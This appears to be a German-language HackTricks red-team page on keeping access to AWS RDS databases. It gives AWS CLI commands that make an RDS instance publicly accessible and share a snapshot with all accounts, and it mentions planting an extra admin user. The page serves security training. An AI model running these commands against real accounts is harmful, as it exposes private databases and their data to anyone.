AWS - RDS Persistenz

Reading time: 2 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

RDS

Für weitere Informationen siehe:

AWS - Relational Database (RDS) Enum

Instanz öffentlich zugänglich machen: rds:ModifyDBInstance

Ein Angreifer mit dieser Berechtigung kann eine bestehende RDS-Instanz ändern, um öffentliche Zugänglichkeit zu ermöglichen.

bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Einen Admin-Benutzer in der DB erstellen

Ein Angreifer könnte einfach einen Benutzer in der DB erstellen, sodass er, selbst wenn das Passwort des Master-Users geändert wird, den Zugriff auf die Datenbank nicht verliert.

Snapshot öffentlich machen

bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks